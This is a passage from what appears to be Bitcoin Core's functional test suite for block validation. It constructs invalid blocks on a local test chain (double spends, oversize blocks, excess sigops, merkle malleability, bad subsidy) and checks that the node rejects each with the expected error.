        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1])
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block with a spend from a re-org'ed out tx")
        self.move_tip(15)
        b17 = self.next_block(17, spend=txout_b3)
        self.sync_blocks([b17], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Attempt to spend a transaction created on a different fork (on a fork this time)
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5)
        #                                                                \-> b18 (b3.vtx[1]) -> b19 (6)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)")
        self.move_tip(13)
        b18 = self.next_block(18, spend=txout_b3)
        self.sync_blocks([b18], False)

        b19 = self.next_block(19, spend=out[6])
        self.sync_blocks([b19], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Attempt to spend a coinbase at depth too low
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block spending an immature coinbase.")
        self.move_tip(15)
        b20 = self.next_block(20, spend=out[7])
        self.sync_blocks([b20], False, 16, b'bad-txns-premature-spend-of-coinbase')

        # Attempt to spend a coinbase at depth too low (on a fork this time)
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5)
        #                                                                \-> b21 (6) -> b22 (5)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block spending an immature coinbase (on a forked chain)")
        self.move_tip(13)
        b21 = self.next_block(21, spend=out[6])
        self.sync_blocks([b21], False)

        b22 = self.next_block(22, spend=out[5])
        self.sync_blocks([b22], False, 16, b'bad-txns-premature-spend-of-coinbase')

        # Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure its accepted/rejected
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6)
        #                                                                           \-> b24 (6) -> b25 (7)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE")
        self.move_tip(15)
        b23 = self.next_block(23, spend=out[6])
        tx = CTransaction()
        script_length = MAX_BLOCK_BASE_SIZE - len(b23.serialize()) - 69
        script_output = CScript([b'\x00' * script_length])
        tx.vout.append(CTxOut(0, script_output))
        tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0)))
        b23 = self.update_block(23, [tx])
        # Make sure the math above worked out to produce a max-sized block
        assert_equal(len(b23.serialize()), MAX_BLOCK_BASE_SIZE)
        self.sync_blocks([b23], True)
        self.save_spendable_output()

        self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1")
        self.move_tip(15)
        b24 = self.next_block(24, spend=out[6])
        script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69
        script_output = CScript([b'\x00' * (script_length + 1)])
        tx.vout = [CTxOut(0, script_output)]
        b24 = self.update_block(24, [tx])
        assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1)
        self.sync_blocks([b24], False, 16, b'bad-blk-length', reconnect=True)

        b25 = self.next_block(25, spend=out[7])
        self.sync_blocks([b25], False)

        # Create blocks with a coinbase input script size out of range
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7)
        #                                                                           \-> ... (6) -> ... (7)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block with coinbase input script size out of range")
        self.move_tip(15)
        b26 = self.next_block(26, spend=out[6])
        b26.vtx[0].vin[0].scriptSig = b'\x00'
        b26.vtx[0].rehash()
        # update_block causes the merkle root to get updated, even with no new
        # transactions, and updates the required state.
        b26 = self.update_block(26, [])
        self.sync_blocks([b26], False, 16, b'bad-cb-length', reconnect=True)

        # Extend the b26 chain to make sure bitcoind isn't accepting b26
        b27 = self.next_block(27, spend=out[7])
        self.sync_blocks([b27], False)

        # Now try a too-large-coinbase script
        self.move_tip(15)
        b28 = self.next_block(28, spend=out[6])
        b28.vtx[0].vin[0].scriptSig = b'\x00' * 101
        b28.vtx[0].rehash()
        b28 = self.update_block(28, [])
        self.sync_blocks([b28], False, 16, b'bad-cb-length', reconnect=True)

        # Extend the b28 chain to make sure bitcoind isn't accepting b28
        b29 = self.next_block(29, spend=out[7])
        self.sync_blocks([b29], False)

        # b30 has a max-sized coinbase scriptSig.
        self.move_tip(23)
        b30 = self.next_block(30)
        b30.vtx[0].vin[0].scriptSig = b'\x00' * 100
        b30.vtx[0].rehash()
        b30 = self.update_block(30, [])
        self.sync_blocks([b30], True)
        self.save_spendable_output()

        # b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY
        #
        #     genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
        #                                                                \-> b36 (11)
        #                                                    \-> b34 (10)
        #                                         \-> b32 (9)
        #

        # MULTISIG: each op code counts as 20 sigops.  To create the edge case, pack another 19 sigops at the end.
        self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops")
        lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
        b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs)
        assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS)
        self.sync_blocks([b31], True)
        self.save_spendable_output()

        # this goes over the limit because the coinbase has one sigop
        self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops")
        too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20))
        b32 = self.next_block(32, spend=out[9], script=too_many_multisigs)
        assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1)
        self.sync_blocks([b32], False, 16, b'bad-blk-sigops', reconnect=True)

        # CHECKMULTISIGVERIFY
        self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops")
        self.move_tip(31)
        lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
        b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs)
        self.sync_blocks([b33], True)
        self.save_spendable_output()

        self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops")
        too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20))
        b34 = self.next_block(34, spend=out[10], script=too_many_multisigs)
        self.sync_blocks([b34], False, 16, b'bad-blk-sigops', reconnect=True)

        # CHECKSIGVERIFY
        self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops")
        self.move_tip(33)
        lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1))
        b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs)
        self.sync_blocks([b35], True)
        self.save_spendable_output()

        self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops")
        too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS))
        b36 = self.next_block(36, spend=out[11], script=too_many_checksigs)
        self.sync_blocks([b36], False, 16, b'bad-blk-sigops', reconnect=True)

        # Check spending of a transaction in a block which failed to connect
        #
        # b6  (3)
        # b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
        #                                                                                     \-> b37 (11)
        #                                                                                     \-> b38 (11/37)
        #

        # save 37's spendable output, but then double-spend out11 to invalidate the block
        self.log.info("Reject a block spending transaction from a block which failed to connect")
        self.move_tip(35)
        b37 = self.next_block(37, spend=out[11])
        txout_b37 = b37.vtx[1]
        tx = self.create_and_sign_transaction(out[11], 0)
        b37 = self.update_block(37, [tx])
        self.sync_blocks([b37], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid
        self.move_tip(35)
        b38 = self.next_block(38, spend=txout_b37)
        self.sync_blocks([b38], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Check P2SH SigOp counting
        #
        #
        #   13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12)
        #                                                                                        \-> b40 (12)
        #
        # b39 - create some P2SH outputs that will require 6 sigops to spend:
        #
        #           redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG
        #           p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL
        #
        self.log.info("Check P2SH SIGOPS are correctly counted")
        self.move_tip(35)
        b39 = self.next_block(39)
        b39_outputs = 0
        b39_sigops_per_output = 6

        # Build the redeem script, hash it, use hash to create the p2sh script
        redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG])
        redeem_script_hash = hash160(redeem_script)
        p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL])

        # Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE
        # This must be signed because it is spending a coinbase
        spend = out[11]
        tx = self.create_tx(spend, 0, 1, p2sh_script)
        tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE])))
        self.sign_tx(tx, spend)
        tx.rehash()
        b39 = self.update_block(39, [tx])
        b39_outputs += 1

        # Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE
        tx_new = None
        tx_last = tx
        total_size = len(b39.serialize())
        while(total_size < MAX_BLOCK_BASE_SIZE):
            tx_new = self.create_tx(tx_last, 1, 1, p2sh_script)
            tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE])))
            tx_new.rehash()
            total_size += len(tx_new.serialize())
            if total_size >= MAX_BLOCK_BASE_SIZE:
                break
            b39.vtx.append(tx_new)  # add tx to block
            tx_last = tx_new
            b39_outputs += 1

        b39 = self.update_block(39, [])
        self.sync_blocks([b39], True)
        self.save_spendable_output()

        # Test sigops in P2SH redeem scripts
        #
        # b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops.
        # The first tx has one sigop and then at the end we add 2 more to put us just over the max.
        #
        # b41 does the same, less one, so it has the maximum sigops permitted.
        #
        self.log.info("Reject a block with too many P2SH sigops")
        self.move_tip(39)
        b40 = self.next_block(40, spend=out[12])
        sigops = get_legacy_sigopcount_block(b40)
        numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output
        assert_equal(numTxes <= b39_outputs, True)

        lastOutpoint = COutPoint(b40.vtx[1].sha256, 0)
        new_txs = []
        for i in range(1, numTxes + 1):
            tx = CTransaction()
            tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
            tx.vin.append(CTxIn(lastOutpoint, b''))
            # second input is corresponding P2SH output from b39
            tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b''))
            # Note: must pass the redeem_script (not p2sh_script) to the signature hash function
            (sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL)
            sig = self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))
            scriptSig = CScript([sig, redeem_script])

            tx.vin[1].scriptSig = scriptSig
            tx.rehash()
            new_txs.append(tx)
            lastOutpoint = COutPoint(tx.sha256, 0)

        b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1
        tx = CTransaction()
        tx.vin.append(CTxIn(lastOutpoint, b''))
        tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill)))
        tx.rehash()
        new_txs.append(tx)
        self.update_block(40, new_txs)
        self.sync_blocks([b40], False, 16, b'bad-blk-sigops', reconnect=True)

        # same as b40, but one less sigop
        self.log.info("Accept a block with the max number of P2SH sigops")
        self.move_tip(39)
        b41 = self.next_block(41, spend=None)
        self.update_block(41, b40.vtx[1:-1])
        b41_sigops_to_fill = b40_sigops_to_fill - 1
        tx = CTransaction()
        tx.vin.append(CTxIn(lastOutpoint, b''))
        tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill)))
        tx.rehash()
        self.update_block(41, [tx])
        self.sync_blocks([b41], True)

        # Fork off of b39 to create a constant base again
        #
        # b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13)
        #                                                                  \-> b41 (12)
        #
        self.move_tip(39)
        b42 = self.next_block(42, spend=out[12])
        self.save_spendable_output()

        b43 = self.next_block(43, spend=out[13])
        self.save_spendable_output()
        self.sync_blocks([b42, b43], True)

        # Test a number of really invalid scenarios
        #
        #  -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14)
        #                                                                                   \-> ??? (15)

        # The next few blocks are going to be created "by hand" since they'll do funky things, such as having
        # the first transaction be non-coinbase, etc.  The purpose of b44 is to make sure this works.
        self.log.info("Build block 44 manually")
        height = self.block_heights[self.tip.sha256] + 1
        coinbase = create_coinbase(height, self.coinbase_pubkey)
        b44 = CBlock()
        b44.nTime = self.tip.nTime + 1
        b44.hashPrevBlock = self.tip.sha256
        b44.nBits = 0x207fffff
        b44.vtx.append(coinbase)
        b44.hashMerkleRoot = b44.calc_merkle_root()
        b44.solve()
        self.tip = b44
        self.block_heights[b44.sha256] = height
        self.blocks[44] = b44
        self.sync_blocks([b44], True)

        self.log.info("Reject a block with a non-coinbase as the first tx")
        non_coinbase = self.create_tx(out[15], 0, 1)
        b45 = CBlock()
        b45.nTime = self.tip.nTime + 1
        b45.hashPrevBlock = self.tip.sha256
        b45.nBits = 0x207fffff
        b45.vtx.append(non_coinbase)
        b45.hashMerkleRoot = b45.calc_merkle_root()
        b45.calc_sha256()
        b45.solve()
        self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1
        self.tip = b45
        self.blocks[45] = b45
        self.sync_blocks([b45], False, 16, b'bad-cb-missing', reconnect=True)

        self.log.info("Reject a block with no transactions")
        self.move_tip(44)
        b46 = CBlock()
        b46.nTime = b44.nTime + 1
        b46.hashPrevBlock = b44.sha256
        b46.nBits = 0x207fffff
        b46.vtx = []
        b46.hashMerkleRoot = 0
        b46.solve()
        self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1
        self.tip = b46
        assert 46 not in self.blocks
        self.blocks[46] = b46
        self.sync_blocks([b46], False, 16, b'bad-blk-length', reconnect=True)

        self.log.info("Reject a block with invalid work")
        self.move_tip(44)
        b47 = self.next_block(47, solve=False)
        target = uint256_from_compact(b47.nBits)
        while b47.sha256 < target:
            b47.nNonce += 1
            b47.rehash()
        self.sync_blocks([b47], False, request_block=False)

        self.log.info("Reject a block with a timestamp >2 hours in the future")
        self.move_tip(44)
        b48 = self.next_block(48, solve=False)
        b48.nTime = int(time.time()) + 60 * 60 * 3
        b48.solve()
        self.sync_blocks([b48], False, request_block=False)

        self.log.info("Reject a block with invalid merkle hash")
        self.move_tip(44)
        b49 = self.next_block(49)
        b49.hashMerkleRoot += 1
        b49.solve()
        self.sync_blocks([b49], False, 16, b'bad-txnmrklroot', reconnect=True)

        self.log.info("Reject a block with incorrect POW limit")
        self.move_tip(44)
        b50 = self.next_block(50)
        b50.nBits = b50.nBits - 1
        b50.solve()
        self.sync_blocks([b50], False, request_block=False, reconnect=True)

        self.log.info("Reject a block with two coinbase transactions")
        self.move_tip(44)
        b51 = self.next_block(51)
        cb2 = create_coinbase(51, self.coinbase_pubkey)
        b51 = self.update_block(51, [cb2])
        self.sync_blocks([b51], False, 16, b'bad-cb-multiple', reconnect=True)

        self.log.info("Reject a block with duplicate transactions")
        # Note: txns have to be in the right position in the merkle tree to trigger this error
        self.move_tip(44)
        b52 = self.next_block(52, spend=out[15])
        tx = self.create_tx(b52.vtx[1], 0, 1)
        b52 = self.update_block(52, [tx, tx])
        self.sync_blocks([b52], False, 16, b'bad-txns-duplicate', reconnect=True)

        # Test block timestamps
        #  -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15)
        #                                                                                   \-> b54 (15)
        #
        self.move_tip(43)
        b53 = self.next_block(53, spend=out[14])
        self.sync_blocks([b53], False)
        self.save_spendable_output()

        self.log.info("Reject a block with timestamp before MedianTimePast")
        b54 = self.next_block(54, spend=out[15])
        b54.nTime = b35.nTime - 1
        b54.solve()
        self.sync_blocks([b54], False, request_block=False)

        # valid timestamp
        self.move_tip(53)
        b55 = self.next_block(55, spend=out[15])
        b55.nTime = b35.nTime
        self.update_block(55, [])
        self.sync_blocks([b55], True)
        self.save_spendable_output()

        # Test Merkle tree malleability
        #
        # -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16)
        #                                                \-> b57   (16)
        #                                                \-> b56p2 (16)
        #                                                \-> b56   (16)
        #
        # Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without
        #                           affecting the merkle root of a block, while still invalidating it.
        #                           See:  src/consensus/merkle.h
        #
        #  b57 has three txns:  coinbase, tx, tx1.  The merkle root computation will duplicate tx.
        #  Result:  OK
        #
        #  b56 copies b57 but duplicates tx1 and does not recalculate the block hash.  So it has a valid merkle
        #  root but duplicate transactions.
        #  Result:  Fails
        #
        #  b57p2 has six transactions in its merkle tree:
        #       - coinbase, tx, tx1, tx2, tx3, tx4
        #  Merkle root calculation will duplicate as necessary.
        #  Result:  OK.
        #
        #  b56p2 copies b57p2 but adds both tx3 and tx4.  The purpose of the test is to make sure the code catches
        #  duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates
        #  that the error was caught early, avoiding a DOS vulnerability.)

        # b57 - a good block with 2 txs, don't submit until end
        self.move_tip(55)
        b57 = self.next_block(57)
        tx = self.create_and_sign_transaction(out[16], 1)
        tx1 = self.create_tx(tx, 0, 1)
        b57 = self.update_block(57, [tx, tx1])

        # b56 - copy b57, add a duplicate tx
        self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)")
        self.move_tip(55)
        b56 = copy.deepcopy(b57)
        self.blocks[56] = b56
        assert_equal(len(b56.vtx), 3)
        b56 = self.update_block(56, [tx1])
        assert_equal(b56.hash, b57.hash)
        self.sync_blocks([b56], False, 16, b'bad-txns-duplicate', reconnect=True)

        # b57p2 - a good block with 6 tx'es, don't submit until end
        self.move_tip(55)
        b57p2 = self.next_block("57p2")
        tx = self.create_and_sign_transaction(out[16], 1)
        tx1 = self.create_tx(tx, 0, 1)
        tx2 = self.create_tx(tx1, 0, 1)
        tx3 = self.create_tx(tx2, 0, 1)
        tx4 = self.create_tx(tx3, 0, 1)
        b57p2 = self.update_block("57p2", [tx, tx1, tx2, tx3, tx4])

        # b56p2 - copy b57p2, duplicate two non-consecutive tx's
        self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)")
        self.move_tip(55)
        b56p2 = copy.deepcopy(b57p2)
        self.blocks["b56p2"] = b56p2
        assert_equal(b56p2.hash, b57p2.hash)
        assert_equal(len(b56p2.vtx), 6)
        b56p2 = self.update_block("b56p2", [tx3, tx4])
        self.sync_blocks([b56p2], False, 16, b'bad-txns-duplicate', reconnect=True)

        self.move_tip("57p2")
        self.sync_blocks([b57p2], True)

        self.move_tip(57)
        self.sync_blocks([b57], False)  # The tip is not updated because 57p2 seen first
        self.save_spendable_output()

        # Test a few invalid tx types
        #
        # -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                    \-> ??? (17)
        #

        # tx with prevout.n out of range
        self.log.info("Reject a block with a transaction with prevout.n out of range")
        self.move_tip(57)
        b58 = self.next_block(58, spend=out[17])
        tx = CTransaction()
        assert(len(out[17].vout) < 42)
        tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff))
        tx.vout.append(CTxOut(0, b""))
        tx.calc_sha256()
        b58 = self.update_block(58, [tx])
        self.sync_blocks([b58], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # tx with output value > input value
        self.log.info("Reject a block with a transaction with outputs > inputs")
        self.move_tip(57)
        b59 = self.next_block(59)
        tx = self.create_and_sign_transaction(out[17], 51 * COIN)
        b59 = self.update_block(59, [tx])
        self.sync_blocks([b59], False, 16, b'bad-txns-in-belowout', reconnect=True)

        # reset to good chain
        self.move_tip(57)
        b60 = self.next_block(60, spend=out[17])
        self.sync_blocks([b60], True)
        self.save_spendable_output()

        # Test BIP30
        #
        # -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                    \-> b61 (18)
        #
        # Blocks are not allowed to contain a transaction whose id matches that of an earlier,
        # not-fully-spent transaction in the same chain. To test, make identical coinbases;
        # the second one should be rejected.
        #
        self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)")
        self.move_tip(60)
        b61 = self.next_block(61, spend=out[18])
        b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig  # Equalize the coinbases
        b61.vtx[0].rehash()
        b61 = self.update_block(61, [])
        assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize())
        self.sync_blocks([b61], False, 16, b'bad-txns-BIP30', reconnect=True)

        # Test tx.isFinal is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests)
        #
        #   -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                     \-> b62 (18)
        #
        self.log.info("Reject a block with a transaction with a nonfinal locktime")
        self.move_tip(60)
        b62 = self.next_block(62)
        tx = CTransaction()
        tx.nLockTime = 0xffffffff  # this locktime is non-final
        tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0)))  # don't set nSequence
        tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
        assert(tx.vin[0].nSequence < 0xffffffff)
        tx.calc_sha256()
        b62 = self.update_block(62, [tx])
        self.sync_blocks([b62], False, 16, b'bad-txns-nonfinal')

        # Test a non-final coinbase is also rejected
        #
        #   -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                     \-> b63 (-)
        #
        self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime")
        self.move_tip(60)
        b63 = self.next_block(63)
        b63.vtx[0].nLockTime = 0xffffffff
        b63.vtx[0].vin[0].nSequence = 0xDEADBEEF
        b63.vtx[0].rehash()
        b63 = self.update_block(63, [])
        self.sync_blocks([b63], False, 16, b'bad-txns-nonfinal')

        #  This checks that a block with a bloated VARINT between the block_header and the array of tx such that
        #  the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint,
        #  does not cause a subsequent, identical block with canonical encoding to be rejected.  The test does not
        #  care whether the bloated block is accepted or rejected; it only cares that the second block is accepted.
        #
        #  What matters is that the receiving node should not reject the bloated block, and then reject the canonical
        #  block on the basis that it's the same as an already-rejected block (which would be a consensus failure.)
        #
        #  -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18)
        #                                                                                        \
        #                                                                                         b64a (18)
        #  b64a is a bloated block (non-canonical varint)
        #  b64 is a good block (same as b64 but w/ canonical varint)
        #
        self.log.info("Accept a valid block even if a bloated version of the block has previously been sent")
        self.move_tip(60)
        regular_block = self.next_block("64a", spend=out[18])

        # make it a "broken_block," with non-canonical serialization
        b64a = CBrokenBlock(regular_block)
        b64a.initialize(regular_block)
        self.blocks["64a"] = b64a
        self.tip = b64a
        tx = CTransaction()

        # use canonical serialization to calculate size
        script_length = MAX_BLOCK_BASE_SIZE - len(b64a.normal_serialize()) - 69
        script_output = CScript([b'\x00' * script_length])
        tx.vout.append(CTxOut(0, script_output))
        tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0)))
        b64a = self.update_block("64a", [tx])
        assert_equal(len(b64a.serialize()), MAX_BLOCK_BASE_SIZE + 8)
        self.sync_blocks([b64a], False, 1, b'error parsing message')

        # bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently
        # resend the header message, it won't send us the getdata message again. Just
        # disconnect and reconnect and then call sync_blocks.
        # TODO: improve this test to be less dependent on P2P DOS behaviour.
        node.disconnect_p2ps()
        self.reconnect_p2p()

        self.move_tip(60)
        b64 = CBlock(b64a)
        b64.vtx = copy.deepcopy(b64a.vtx)
        assert_equal(b64.hash, b64a.hash)
        assert_equal(len(b64.serialize()), MAX_BLOCK_BASE_SIZE)
        self.blocks[64] = b64
        b64 = self.update_block(64, [])
        self.sync_blocks([b64], True)
        self.save_spendable_output()

        # Spend an output created in the block itself
        #
        # -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
        #
        self.log.info("Accept a block with a transaction spending an output created in the same block")
        self.move_tip(64)
        b65 = self.next_block(65)
        tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue)
        tx2 = self.create_and_sign_transaction(tx1, 0)
        b65 = self.update_block(65, [tx1, tx2])
        self.sync_blocks([b65], True)
        self.save_spendable_output()

        # Attempt to spend an output created later in the same block
        #
        # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
        #                                                                                    \-> b66 (20)
        self.log.info("Reject a block with a transaction spending an output created later in the same block")
        self.move_tip(65)
        b66 = self.next_block(66)
        tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
        tx2 = self.create_and_sign_transaction(tx1, 1)
        b66 = self.update_block(66, [tx2, tx1])
        self.sync_blocks([b66], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Attempt to double-spend a transaction created in a block
        #
        # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
        #                                                                                    \-> b67 (20)
        #
        #
        self.log.info("Reject a block with a transaction double spending a transaction creted in the same block")
        self.move_tip(65)
        b67 = self.next_block(67)
        tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
        tx2 = self.create_and_sign_transaction(tx1, 1)
        tx3 = self.create_and_sign_transaction(tx1, 2)
        b67 = self.update_block(67, [tx1, tx2, tx3])
        self.sync_blocks([b67], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # More tests of block subsidy
        #
        # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
        #                                                                                    \-> b68 (20)
        #
        # b68 - coinbase with an extra 10 satoshis,
        #       creates a tx that has 9 satoshis from out[20] go to fees
        #       this fails because the coinbase is trying to claim 1 satoshi too much in fees
        #
        # b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee
        #       this succeeds
        #
        self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction")
        self.move_tip(65)
        b68 = self.next_block(68, additional_coinbase_value=10)
        tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9)
        b68 = self.update_block(68, [tx])
        self.sync_blocks([b68], False, 16, b'bad-cb-amount', reconnect=True)

        self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction")
        self.move_tip(65)
        b69 = self.next_block(69, additional_coinbase_value=10)
        tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10)
        self.update_block(69, [tx])
        self.sync_blocks([b69], True)
        self.save_spendable_output()

        # Test spending the outpoint of a non-existent transaction
        #
        # -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
        #                                                                                    \-> b70 (21)
        #
        self.log.info("Reject a block containing a transaction spending from a non-existent input")
        self.move_tip(69)
        b70 = self.next_block(70, spend=out[21])
        bogus_tx = CTransaction()
        bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c")
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff))
        tx.vout.append(CTxOut(1, b""))
        b70 = self.update_block(70, [tx])
        self.sync_blocks([b70], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks)
        #
        #  -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
        #                                                                                      \-> b71 (21)
        #
        # b72 is a good block.
        # b71 is a copy of 72, but re-adds one of its transactions.  However, it has the same hash as b72.
        self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability")
        self.move_tip(69)
        b72 = self.next_block(72)
        tx1 = self.create_and_sign_transaction(out[21], 2)
        tx2 = self.create_and_sign_transaction(tx1, 1)
        b72 = self.update_block(72, [tx1, tx2])  # now tip is 72
        b71 = copy.deepcopy(b72)
        b71.vtx.append(tx2)   # add duplicate tx2
        self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1  # b71 builds off b69
        self.blocks[71] = b71

